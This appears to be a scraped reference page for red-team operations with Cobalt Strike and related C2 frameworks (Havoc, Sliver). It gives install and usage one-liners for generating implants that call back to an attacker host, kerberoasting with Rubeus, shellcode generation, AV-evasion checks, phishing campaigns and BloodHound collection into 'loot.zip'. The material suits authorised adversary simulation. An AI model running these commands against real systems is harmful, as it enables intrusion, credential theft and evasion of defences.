Red team operations with Cobalt Strike — C2, beacon ops, evasion, persistence.
Official PageBeacon Object File collection for recon
git clone https://github.com/trustedsec/CS-Situational-Awareness-BOFinline-execute sa-bof.oCommercial C2 framework for adversary simulation
Licensed purchaseteamserver IP pass cobaltstrike.profile; connect via CS clientModern open-source C2 framework
git clone https://github.com/HavocFramework/Havoc && make./havoc server --profile profile.yaotl; ./havoc clientFOSS C2 with mTLS/HTTP/DNS
go install github.com/BishopFox/sliver/client@latestsliver-server; generate --http attackerKerberos toolset
Compile from sourceexecute-assembly Rubeus.exe kerberoast /outfile:hashes.txtShellcode generator from .NET/PE
pip3 install donut-shellcodedonut -f 1 -a 2 -o shellcode.bin payload.exeIdentifies AV-triggering bytes
Build from sourceThreatCheck.exe -f beacon.exe -e AMSIPhishing campaign platform
Download releasesConfigure sendingprofile, template, campaignBloodHound collector for CS
Load as beacon commandexecute-assembly SharpHound.exe -c All --zipfilename loot.zip